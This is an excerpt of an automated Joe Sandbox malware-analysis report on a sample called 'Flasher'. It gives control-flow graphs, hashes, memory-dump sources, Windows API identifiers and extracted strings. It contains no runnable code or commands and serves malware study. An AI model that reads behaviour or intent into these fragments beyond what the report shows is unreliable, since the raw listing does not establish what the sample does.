                                                                      • Instruction ID: 6efc362df82c8f38fec07b2021b518d33f9780cb501ea4a5d13d7d565c1079e2
                                                                      • Opcode Fuzzy Hash: 7cd5136b3e42d234a67513e18849590ffb5a2aa6941adb03c3e0e7bc223c34dc
                                                                      • Instruction Fuzzy Hash: 84B2A332A0CBC685EA708B15E4463BEE760FB85794F444236DA8DA7B99CF7CE165C700

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 16946 7ff6d35b50f7-7ff6d35b5120 16947 7ff6d35b51b8-7ff6d35b51dc 16946->16947 16948 7ff6d35b5126-7ff6d35b5149 call 7ff6d3551f0e call 7ff6d358e677 16946->16948 16949 7ff6d35b51e2-7ff6d35b51ed 16947->16949 16950 7ff6d35b57eb-7ff6d35b5800 call 7ff6d35efed0 16947->16950 16970 7ff6d35b515d-7ff6d35b5177 call 7ff6d35b37d9 16948->16970 16971 7ff6d35b514b-7ff6d35b5157 HeapFree 16948->16971 16953 7ff6d35b6baf call 7ff6d3736f7b 16949->16953 16954 7ff6d35b51f3-7ff6d35b51fe 16949->16954 16962 7ff6d35b5806-7ff6d35b5838 16950->16962 16963 7ff6d35b6bbb-7ff6d35b6bc5 call 7ff6d373420a 16950->16963 16961 7ff6d35b6bb4 16953->16961 16958 7ff6d35b5204-7ff6d35b5266 call 7ff6d35db150 16954->16958 16959 7ff6d35b6bb9 16954->16959 16974 7ff6d35b5268-7ff6d35b5289 16958->16974 16975 7ff6d35b528b-7ff6d35b52b3 call 7ff6d35db150 16958->16975 16959->16963 16961->16959 16966 7ff6d35b583e-7ff6d35b5853 call 7ff6d35efed0 16962->16966 16967 7ff6d35b6bca-7ff6d35b6bd8 call 7ff6d357f511 16962->16967 16963->16967 16978 7ff6d35b6bdd-7ff6d35b6be7 call 7ff6d373420a 16966->16978 16986 7ff6d35b5859-7ff6d35b5888 16966->16986 16967->16978 16982 7ff6d35b5191-7ff6d35b519b 16970->16982 16983 7ff6d35b5179-7ff6d35b517b 16970->16983 16971->16970 16979 7ff6d35b52d5-7ff6d35b52f0 16974->16979 16997 7ff6d35b52b5-7ff6d35b52c1 HeapFree 16975->16997 16998 7ff6d35b52c7-7ff6d35b52cf 16975->16998 16996 7ff6d35b6bec-7ff6d35b6bf6 call 7ff6d373420a 16978->16996 16984 7ff6d35b5725 16979->16984 16985 7ff6d35b52f6-7ff6d35b539a 16979->16985 16991 7ff6d35b51a1-7ff6d35b51b3 HeapFree 16982->16991 16992 7ff6d35b6027-7ff6d35b6047 call 7ff6d35b382c 16982->16992 16989 7ff6d35b5182-7ff6d35b518f CertFreeCertificateContext 16983->16989 16993 7ff6d35b572f-7ff6d35b5732 16984->16993 16990 7ff6d35b53a1-7ff6d35b53c1 call 7ff6d3562616 16985->16990 16994 7ff6d35b58ae-7ff6d35b58c4 16986->16994 16995 7ff6d35b588a-7ff6d35b5895 16986->16995 16989->16982 16989->16989 17018 7ff6d35b53c3-7ff6d35b53e9 16990->17018 17019 7ff6d35b53eb-7ff6d35b53f3 16990->17019 16991->16992 17021 7ff6d35b605e-7ff6d35b607f 16992->17021 17022 7ff6d35b6049-7ff6d35b604d 16992->17022 17001 7ff6d35b5734-7ff6d35b5743 HeapFree 16993->17001 17002 7ff6d35b5752-7ff6d35b57ab call 7ff6d358e718 memmove 16993->17002 17007 7ff6d35b5989-7ff6d35b598d 16994->17007 17008 7ff6d35b58ca-7ff6d35b5908 call 7ff6d35efed0 16994->17008 17004 7ff6d35b58a1-7ff6d35b58ab 16995->17004 17005 7ff6d35b5897-7ff6d35b589c call 7ff6d358e7a7 16995->17005 17016 7ff6d35b6bfb-7ff6d35b6c05 call 7ff6d373420a 16996->17016 16997->16998 16998->16979 16999 7ff6d35b5745-7ff6d35b574d call 7ff6d35bfc99 16998->16999 16999->17002 17001->17002 17031 7ff6d35b57ad-7ff6d35b57b5 call 7ff6d35bf2c0 17002->17031 17032 7ff6d35b57ba-7ff6d35b57e3 memmove 17002->17032 17004->16994 17005->17004 17007->16959 17011 7ff6d35b5993-7ff6d35b59a8 call 7ff6d35efed0 17007->17011 17008->17016 17025 7ff6d35b590e-7ff6d35b595c call 7ff6d35efed0 17008->17025 17011->16996 17039 7ff6d35b59ae-7ff6d35b5a89 17011->17039 17033 7ff6d35b6c0a-7ff6d35b6c17 17016->17033 17026 7ff6d35b542e-7ff6d35b5439 call 7ff6d3565ab6 17018->17026 17027 7ff6d35b53f9-7ff6d35b5420 17019->17027 17028 7ff6d35b56da-7ff6d35b5723 17019->17028 17022->17021 17030 7ff6d35b604f-7ff6d35b6059 call 7ff6d358e7a7 17022->17030 17025->16963 17049 7ff6d35b5962-7ff6d35b5986 17025->17049 17026->17028 17050 7ff6d35b543f-7ff6d35b5494 17026->17050 17027->17028 17037 7ff6d35b5426 17027->17037 17028->16993 17030->17021 17031->17032 17032->16950 17035 7ff6d35b6c1c-7ff6d35b6c5b call 7ff6d37341f0 call 7ff6d373420a * 3 17033->17035 17037->17026 17044 7ff6d35b5ad4-7ff6d35b5adb 17039->17044 17045 7ff6d35b5a8b-7ff6d35b5a9c 17039->17045 17047 7ff6d35b5af9-7ff6d35b5afc 17044->17047 17048 7ff6d35b5add-7ff6d35b5ae3 17044->17048 17051 7ff6d35b5a9f-7ff6d35b5aab 17045->17051 17054 7ff6d35b5b10-7ff6d35b5b2b 17047->17054 17055 7ff6d35b5afe-7ff6d35b5b0a HeapFree 17047->17055 17053 7ff6d35b5aea-7ff6d35b5af7 CertFreeCertificateContext 17048->17053 17049->17007 17056 7ff6d35b549a-7ff6d35b54c2 17050->17056 17057 7ff6d35b5abd-7ff6d35b5ad0 17051->17057 17058 7ff6d35b5aad-7ff6d35b5ab5 call 7ff6d35786bf 17051->17058 17053->17047 17053->17053 17054->16992 17055->17054 17065 7ff6d35b54e1-7ff6d35b5500 17056->17065 17066 7ff6d35b54c4-7ff6d35b54d8 17056->17066 17057->17051 17059 7ff6d35b5ad2 17057->17059 17058->17057 17059->17047 17069 7ff6d35b5504 17065->17069 17066->17056 17068 7ff6d35b54da-7ff6d35b54df 17066->17068 17068->17069 17071 7ff6d35b5507-7ff6d35b5516 17069->17071 17073 7ff6d35b5518 17071->17073 17074 7ff6d35b551d-7ff6d35b5522 17071->17074 17073->17074 17075 7ff6d35b5524-7ff6d35b5529 17074->17075 17076 7ff6d35b553d-7ff6d35b5547 17074->17076 17077 7ff6d35b552f-7ff6d35b553b HeapFree 17075->17077 17078 7ff6d35b552b 17075->17078 17076->17071 17079 7ff6d35b5549-7ff6d35b554c 17076->17079 17077->17076 17078->17077 17080 7ff6d35b554e-7ff6d35b555e 17079->17080 17081 7ff6d35b55c6-7ff6d35b55f1 call 7ff6d353df50 17079->17081 17080->17081 17083 7ff6d35b5560-7ff6d35b5595 17080->17083 17089 7ff6d35b55f3-7ff6d35b55f6 17081->17089 17090 7ff6d35b561c-7ff6d35b5629 17081->17090 17085 7ff6d35b55a1-7ff6d35b55c1 17083->17085 17086 7ff6d35b5597-7ff6d35b559c call 7ff6d35bfcd3 17083->17086 17088 7ff6d35b5658-7ff6d35b5664 17085->17088 17086->17085 17091 7ff6d35b56c6-7ff6d35b56d4 17088->17091 17089->17035 17092 7ff6d35b55fc 17089->17092 17093 7ff6d35b5635-7ff6d35b5651 17090->17093 17094 7ff6d35b562b-7ff6d35b5630 call 7ff6d35bfcd3 17090->17094 17091->16990 17091->17028 17095 7ff6d35b55fe-7ff6d35b5611 call 7ff6d35efed0 17092->17095 17096 7ff6d35b5666-7ff6d35b566b 17092->17096 17093->17088 17094->17093 17095->17033 17104 7ff6d35b5617-7ff6d35b561a 17095->17104 17098 7ff6d35b566d-7ff6d35b5690 memmove 17096->17098 17100 7ff6d35b569f-7ff6d35b56be 17098->17100 17101 7ff6d35b5692-7ff6d35b569a call 7ff6d35cc65d 17098->17101 17100->17091 17101->17100 17104->17098
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Free$Heap$memmove$CertCertificateContext
                                                                      • String ID: NO_PROXYno_proxy[
                                                                      • API String ID: 3898322817-3749343514
                                                                      • Opcode ID: 965935827c95a79896765aefca84667381249f2dc3463391de2b907a85e28237
                                                                      • Instruction ID: 5d3db489b69f7e2a4f7698cc88a37217161dcfd1d1a1fd5703db972e56962ca5
                                                                      • Opcode Fuzzy Hash: 965935827c95a79896765aefca84667381249f2dc3463391de2b907a85e28237
                                                                      • Instruction Fuzzy Hash: 00528732A0CBC985E6659B14E4463EEB7A0FB99B80F444136CACDA7B99DF3CD165C700

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 17105 7ff6d34f1000-7ff6d34f1052 17106 7ff6d34f124a-7ff6d34f125c 17105->17106 17107 7ff6d34f1058-7ff6d34f1083 17105->17107 17108 7ff6d34f1c6d 17106->17108 17111 7ff6d34f1261-7ff6d34f128a 17107->17111 17112 7ff6d34f1089-7ff6d34f1091 17107->17112 17109 7ff6d34f1c74-7ff6d34f1ca9 17108->17109 17113 7ff6d34f12b1-7ff6d34f12b9 17111->17113 17112->17106 17114 7ff6d34f1097-7ff6d34f10b1 17112->17114 17117 7ff6d34f1c2f-7ff6d34f1c48 17113->17117 17115 7ff6d34f128c-7ff6d34f12ae 17114->17115 17116 7ff6d34f10b7-7ff6d34f10fe call 7ff6d360c640 17114->17116 17115->17113 17123 7ff6d34f1104-7ff6d34f1106 17116->17123 17119 7ff6d34f1c52-7ff6d34f1c69 17117->17119 17120 7ff6d34f1c4a-7ff6d34f1c4d call 7ff6d34f8718 17117->17120 17119->17108 17120->17119 17124 7ff6d34f12be-7ff6d34f12c0 17123->17124 17125 7ff6d34f110c-7ff6d34f113f call 7ff6d360d62a 17123->17125 17127 7ff6d34f1c0a-7ff6d34f1c0c 17124->17127 17130 7ff6d34f12c5-7ff6d34f12f3 17125->17130 17131 7ff6d34f1145-7ff6d34f1194 17125->17131 17128 7ff6d34f1c16-7ff6d34f1c1a 17127->17128 17132 7ff6d34f1c20-7ff6d34f1c2b 17128->17132 17135 7ff6d34f1340-7ff6d34f135e SafeArrayDestroy 17130->17135 17133 7ff6d34f11cf-7ff6d34f11f0 call 7ff6d360cab7 17131->17133 17134 7ff6d34f1196-7ff6d34f1199 17131->17134 17132->17117 17147 7ff6d34f12fa-7ff6d34f1338 call 7ff6d360cafe 17133->17147 17148 7ff6d34f11f6-7ff6d34f1208 17133->17148 17138 7ff6d34f119c-7ff6d34f119f 17134->17138 17136 7ff6d34f1364-7ff6d34f1367 17135->17136 17137 7ff6d34f1baf-7ff6d34f1bb4 17135->17137 17140 7ff6d34f136d-7ff6d34f13c2 call 7ff6d355daf7 17136->17140 17141 7ff6d34f1be7-7ff6d34f1bfe 17136->17141 17144 7ff6d34f1c00-7ff6d34f1c05 call 7ff6d360c640 17137->17144 17145 7ff6d34f1bb6-7ff6d34f1bd1 call 7ff6d3577892 17137->17145 17142 7ff6d34f11a5-7ff6d34f11c5 17138->17142 17143 7ff6d34f1fbf-7ff6d34f1fd2 call 7ff6d3734750 17138->17143 17162 7ff6d34f1caa-7ff6d34f1cba 17140->17162 17163 7ff6d34f13c8-7ff6d34f1410 17140->17163 17141->17128 17142->17138 17151 7ff6d34f11c7 17142->17151 17158 7ff6d34f1fd7-7ff6d34f1fda 17143->17158 17144->17127 17145->17127 17165 7ff6d34f1bd3-7ff6d34f1be5 HeapFree 17145->17165 17147->17135 17148->17147 17154 7ff6d34f120e-7ff6d34f1211 17148->17154 17151->17133 17160 7ff6d34f12f5 17154->17160 17161 7ff6d34f1217-7ff6d34f1237 HeapReAlloc 17154->17161 17159 7ff6d34f1fec-7ff6d34f1ff9 call 7ff6d37341f0 17158->17159 17160->17147 17161->17147 17167 7ff6d34f123d-7ff6d34f1245 call 7ff6d373420a 17161->17167 17169 7ff6d34f1cbd-7ff6d34f1cc2 17162->17169 17168 7ff6d34f1418-7ff6d34f1440 17163->17168 17165->17127 17167->17106 17168->17158 17172 7ff6d34f1446-7ff6d34f145c 17168->17172 17173 7ff6d34f1f2b-7ff6d34f1f41 call 7ff6d3577892 17169->17173 17174 7ff6d34f1484-7ff6d34f148a 17172->17174 17175 7ff6d34f145e-7ff6d34f1471 call 7ff6d35efed0 17172->17175 17180 7ff6d34f1f55-7ff6d34f1f62 17173->17180 17181 7ff6d34f1f43-7ff6d34f1f4f HeapFree 17173->17181 17178 7ff6d34f1496-7ff6d34f14c3 memmove call 7ff6d360d277 17174->17178 17184 7ff6d34f1fdc-7ff6d34f1fe9 17175->17184 17185 7ff6d34f1477-7ff6d34f1482 17175->17185 17188 7ff6d34f14c9-7ff6d34f1525 17178->17188 17189 7ff6d34f1cc7-7ff6d34f1cf5 17178->17189 17190 7ff6d34f1f64-7ff6d34f1fa8 17180->17190 17191 7ff6d34f1fad-7ff6d34f1fba 17180->17191 17181->17180 17184->17159 17185->17178 17195 7ff6d34f1cfa-7ff6d34f1d26 17188->17195 17196 7ff6d34f152b-7ff6d34f154c 17188->17196 17192 7ff6d34f1ee8 17189->17192 17190->17109 17191->17132 17194 7ff6d34f1ef0-7ff6d34f1ef3 17192->17194 17197 7ff6d34f1ef5-7ff6d34f1f01 HeapFree 17194->17197 17198 7ff6d34f1f07-7ff6d34f1f23 call 7ff6d34f784d 17194->17198 17199 7ff6d34f1eca-7ff6d34f1ee0 SysFreeString 17195->17199 17200 7ff6d34f154e-7ff6d34f1552 17196->17200 17201 7ff6d34f157f-7ff6d34f15aa call 7ff6d360d62a 17196->17201 17197->17198 17198->17173 17199->17192 17203 7ff6d34f1e11-7ff6d34f1e9d 17200->17203 17204 7ff6d34f1558-7ff6d34f1571 17200->17204 17210 7ff6d34f15b4-7ff6d34f15d2 17201->17210 17211 7ff6d34f15ac-7ff6d34f15b2 17201->17211 17212 7ff6d34f1ea5-7ff6d34f1ebd 17203->17212 17204->17201 17213 7ff6d34f15d6-7ff6d34f15fd 17210->17213 17211->17213 17214 7ff6d34f1ec2 17212->17214 17215 7ff6d34f17a2-7ff6d34f1842 call 7ff6d360b4c6 17213->17215 17216 7ff6d34f1603 17213->17216 17214->17199 17219 7ff6d34f1d2b-7ff6d34f1d40 17215->17219 17220 7ff6d34f1848-7ff6d34f187f VariantClear 17215->17220 17216->17212 17216->17215 17219->17214 17221 7ff6d34f1d45-7ff6d34f1d7e call 7ff6d34f8914 17220->17221 17222 7ff6d34f1885-7ff6d34f18db SysFreeString call 7ff6d3501487 17220->17222 17221->17199 17227 7ff6d34f1d83-7ff6d34f1dca 17222->17227 17228 7ff6d34f18e1-7ff6d34f194b call 7ff6d35a58ef 17222->17228 17227->17194 17231 7ff6d34f1b95-7ff6d34f1baa call 7ff6d3733c44 17228->17231 17232 7ff6d34f1951-7ff6d34f1991 17228->17232 17231->17137 17233 7ff6d34f1993-7ff6d34f19ae 17232->17233 17235 7ff6d34f19b0-7ff6d34f19c5 17233->17235 17236 7ff6d34f19e7-7ff6d34f19f0 17233->17236 17238 7ff6d34f19dd-7ff6d34f19e5 17235->17238 17239 7ff6d34f19c7-7ff6d34f19db memcmp 17235->17239 17240 7ff6d34f19f2-7ff6d34f1a08 17236->17240 17241 7ff6d34f1a10-7ff6d34f1a21 17236->17241 17238->17235 17238->17236 17239->17238 17242 7ff6d34f1a3d-7ff6d34f1a8f 17239->17242 17240->17241 17243 7ff6d34f1ae1-7ff6d34f1aee 17241->17243 17244 7ff6d34f1a27-7ff6d34f1a38 17241->17244 17247 7ff6d34f1aa3-7ff6d34f1aba 17242->17247 17248 7ff6d34f1a91-7ff6d34f1a9d HeapFree 17242->17248 17245 7ff6d34f1af0-7ff6d34f1afb 17243->17245 17246 7ff6d34f1afe-7ff6d34f1b90 17243->17246 17244->17233 17245->17246 17250 7ff6d34f1ac6-7ff6d34f1ad6 17246->17250 17249 7ff6d34f1abc-7ff6d34f1ac1 call 7ff6d34f8914 17247->17249 17247->17250 17248->17247 17249->17250 17250->17168 17252 7ff6d34f1adc-7ff6d34f1e0c 17250->17252 17252->17169
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$AllocArrayDestroySafeStringmemmove
                                                                      • String ID:
                                                                      • API String ID: 980382818-0
                                                                      • Opcode ID: 8e825ee235cc5a5f044f56684b05d2d0d1a0a2c6ddab51d64ee2ced3e7c850bb
                                                                      • Instruction ID: 0091734d061cfdf885716feac183e3b22826bb715a88a31d9c9fd93c4c539dfc
                                                                      • Opcode Fuzzy Hash: 8e825ee235cc5a5f044f56684b05d2d0d1a0a2c6ddab51d64ee2ced3e7c850bb
                                                                      • Instruction Fuzzy Hash: 70720436A18BC581E6708B16E8413AEF3A4FB88B80F544126DEDDA7B59DF3CD465DB00

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateErrorFileStatus
                                                                      • String ID: called `Result::unwrap()` on an `Err` value
                                                                      • API String ID: 3864118154-2333694755
                                                                      • Opcode ID: d431699d3922680ec265eb0371079d4bf6006aba1b65169a2c528513c2fa7973
                                                                      • Instruction ID: 0183f947a9305e93f11e56c6d42268db95c3a01c1588e7ff1cf8f0a06c58fdf5
                                                                      • Opcode Fuzzy Hash: d431699d3922680ec265eb0371079d4bf6006aba1b65169a2c528513c2fa7973
                                                                      • Instruction Fuzzy Hash: 1D71A672A08B8582E7509F25F4423AEB7A0FB88790F548136EB9D93B94DF3CD5A5C740

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 17415 7ff6d34f3568-7ff6d34f3590 17416 7ff6d34f359a-7ff6d34f35a0 call 7ff6d350249c 17415->17416 17418 7ff6d34f35a5-7ff6d34f35ad 17416->17418 17419 7ff6d34f35b3-7ff6d34f35bb 17418->17419 17420 7ff6d34f3788-7ff6d34f3792 17418->17420 17421 7ff6d34f35c1-7ff6d34f35f5 call 7ff6d350218b 17419->17421 17422 7ff6d34f3cc7-7ff6d34f3cd9 17419->17422 17423 7ff6d34f3797-7ff6d34f37b7 17420->17423 17421->17423 17431 7ff6d34f35fb-7ff6d34f3630 call 7ff6d350218b 17421->17431 17424 7ff6d34f3cdc-7ff6d34f3cef 17422->17424 17426 7ff6d34f37c1-7ff6d34f3843 17423->17426 17428 7ff6d34f3c6e-7ff6d34f3cc5 17426->17428 17429 7ff6d34f3849-7ff6d34f385b call 7ff6d34f89bf 17426->17429 17428->17424 17429->17416 17435 7ff6d34f3860-7ff6d34f3883 17431->17435 17436 7ff6d34f3636-7ff6d34f3677 call 7ff6d3502020 17431->17436 17437 7ff6d34f3889-7ff6d34f38d0 HeapFree 17435->17437 17438 7ff6d34f3c57-7ff6d34f3c61 17435->17438 17442 7ff6d34f38d5-7ff6d34f38fb 17436->17442 17443 7ff6d34f367d-7ff6d34f36b7 call 7ff6d350218b 17436->17443 17441 7ff6d34f3c64-7ff6d34f3c69 17437->17441 17438->17441 17441->17426 17445 7ff6d34f3923-7ff6d34f3935 17442->17445 17446 7ff6d34f38fd-7ff6d34f3920 HeapFree 17442->17446 17450 7ff6d34f3981-7ff6d34f39ac 17443->17450 17451 7ff6d34f36bd-7ff6d34f36db call 7ff6d3502384 17443->17451 17448 7ff6d34f396a-7ff6d34f397c 17445->17448 17449 7ff6d34f3937-7ff6d34f3965 HeapFree 17445->17449 17446->17445 17448->17426 17449->17448 17453 7ff6d34f39d3-7ff6d34f39e1 17450->17453 17454 7ff6d34f39ae-7ff6d34f39ce HeapFree 17450->17454 17458 7ff6d34f36e1-7ff6d34f3707 call 7ff6d3502384 17451->17458 17459 7ff6d34f3a36-7ff6d34f3a7e 17451->17459 17456 7ff6d34f39e3-7ff6d34f3a09 HeapFree 17453->17456 17457 7ff6d34f3a0e-7ff6d34f3a16 17453->17457 17454->17453 17456->17457 17460 7ff6d34f3c05-7ff6d34f3c4d HeapFree 17457->17460 17461 7ff6d34f3a1c-7ff6d34f3a31 17457->17461 17470 7ff6d34f3b24-7ff6d34f3b79 17458->17470 17471 7ff6d34f370d-7ff6d34f3731 17458->17471 17462 7ff6d34f3a80-7ff6d34f3aa6 HeapFree 17459->17462 17463 7ff6d34f3aab-7ff6d34f3ab1 17459->17463 17460->17441 17461->17441 17462->17463 17465 7ff6d34f3ab3-7ff6d34f3ad6 HeapFree 17463->17465 17466 7ff6d34f3adb-7ff6d34f3ae1 17463->17466 17465->17466 17468 7ff6d34f3ae3-7ff6d34f3b06 HeapFree 17466->17468 17469 7ff6d34f3b0b-7ff6d34f3b19 17466->17469 17468->17469 17469->17460 17472 7ff6d34f3b1f 17469->17472 17473 7ff6d34f3b9a-7ff6d34f3ba0 17470->17473 17474 7ff6d34f3b7b-7ff6d34f3b95 HeapFree 17470->17474 17471->17422 17475 7ff6d34f3737-7ff6d34f3786 17471->17475 17476 7ff6d34f3c52 17472->17476 17477 7ff6d34f3ba2-7ff6d34f3bc1 HeapFree 17473->17477 17478 7ff6d34f3bc6-7ff6d34f3bcc 17473->17478 17474->17473 17475->17426 17476->17438 17477->17478 17479 7ff6d34f3bf2-7ff6d34f3c03 17478->17479 17480 7ff6d34f3bce-7ff6d34f3bed HeapFree 17478->17480 17479->17460 17481 7ff6d34f3c4f 17479->17481 17480->17479 17481->17476
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: 0e7b6e309d271baea21f1f7964f811d1dcda9e9e3360c80bc6d8f0b7b7a3122c
                                                                      • Instruction ID: f15271d757ebc501ca4027bdb944936394a0a8e64c3fc5c1e1abd5a111989ecf
                                                                      • Opcode Fuzzy Hash: 0e7b6e309d271baea21f1f7964f811d1dcda9e9e3360c80bc6d8f0b7b7a3122c
                                                                      • Instruction Fuzzy Hash: 9F12F536608BD582D660CB16E84176EB7A1F789FD4F148026EE8DA3B68CF3DD056DB04

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 17502 7ff6d3524a81-7ff6d3524ab8 call 7ff6d35db520 17505 7ff6d3524aea-7ff6d3524aec call 7ff6d3736286 17502->17505 17506 7ff6d3524aba-7ff6d3524abd 17502->17506 17508 7ff6d3524af1-7ff6d3524b0e 17505->17508 17507 7ff6d3524abf-7ff6d3524ae5 call 7ff6d3734a10 17506->17507 17506->17508 17507->17505 17511 7ff6d352dcd4 17508->17511 17512 7ff6d3524b14-7ff6d3524b56 call 7ff6d37392c1 17508->17512 17514 7ff6d352dcd6-7ff6d352dcf5 17511->17514 17516 7ff6d3524b5d 17512->17516 17517 7ff6d3524b64-7ff6d3524b68 17516->17517 17518 7ff6d3524ba7-7ff6d3524bbd 17517->17518 17519 7ff6d3524b6a-7ff6d3524b74 17517->17519 17518->17517 17520 7ff6d3524bbf-7ff6d3524bc7 17518->17520 17521 7ff6d3524b76-7ff6d3524b7e 17519->17521 17522 7ff6d3524b9a-7ff6d3524ba0 call 7ff6d357a371 17519->17522 17524 7ff6d3524bc9-7ff6d3524bd7 17520->17524 17525 7ff6d3524bf5-7ff6d3524c0a 17520->17525 17521->17522 17526 7ff6d3524b80-7ff6d3524b98 call 7ff6d357a46b 17521->17526 17527 7ff6d3524ba5 17522->17527 17528 7ff6d3524bd9-7ff6d3524be0 call 7ff6d35fefc3 17524->17528 17529 7ff6d3524be5-7ff6d3524bf3 17524->17529 17530 7ff6d3524c3c-7ff6d3524c67 call 7ff6d37392c1 17525->17530 17531 7ff6d3524c0c-7ff6d3524c26 17525->17531 17526->17527 17527->17518 17528->17529 17535 7ff6d3524c2a-7ff6d3524c34 17529->17535 17530->17531 17531->17535 17535->17516 17538 7ff6d3524c3a-7ff6d3524cef call 7ff6d357a352 call 7ff6d3531a60 17535->17538 17544 7ff6d3524d07-7ff6d3524d0f 17538->17544 17545 7ff6d3524cf1-7ff6d3524d01 HeapFree 17538->17545 17546 7ff6d3524d27-7ff6d3524da1 call 7ff6d35e1360 call 7ff6d35de9a0 17544->17546 17547 7ff6d3524d11-7ff6d3524d21 HeapFree 17544->17547 17545->17544 17552 7ff6d3524da7-7ff6d3524db5 CoInitializeEx 17546->17552 17553 7ff6d352dd0f-7ff6d352dd19 17546->17553 17547->17546 17552->17514 17554 7ff6d3524dbb-7ff6d3524df0 CoInitializeSecurity 17552->17554 17554->17514 17555 7ff6d3524df6-7ff6d3524eda call 7ff6d35db520 call 7ff6d34fe8b8 call 7ff6d3531a60 17554->17555 17562 7ff6d3524edc-7ff6d3524ee8 HeapFree 17555->17562 17563 7ff6d3524eee-7ff6d3524fe3 call 7ff6d34fe678 call 7ff6d3531a60 call 7ff6d34f5593 17555->17563 17562->17563 17569 7ff6d3524fe8-7ff6d3524fea 17563->17569 17570 7ff6d3524ff0-7ff6d352502c call 7ff6d34ff653 17569->17570 17571 7ff6d352dd25-7ff6d352dd2f 17569->17571 17574 7ff6d3525033-7ff6d3525050 17570->17574 17574->17574 17575 7ff6d3525052-7ff6d35250b0 17574->17575 17575->17511
                                                                      APIs
                                                                      Strings
                                                                      • ilureInvalidQueryMultipleStatementInvalidParameterCountSqlInputErrorsql, xrefs: 00007FF6D3524F0C
                                                                      • cannot access a Thread Local Storage value during or after destruction/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\std\src\thread\local.rs, xrefs: 00007FF6D3524ACB
                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789, xrefs: 00007FF6D3524B56
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$ErrorLast$Initialize$PathSecurityTemp
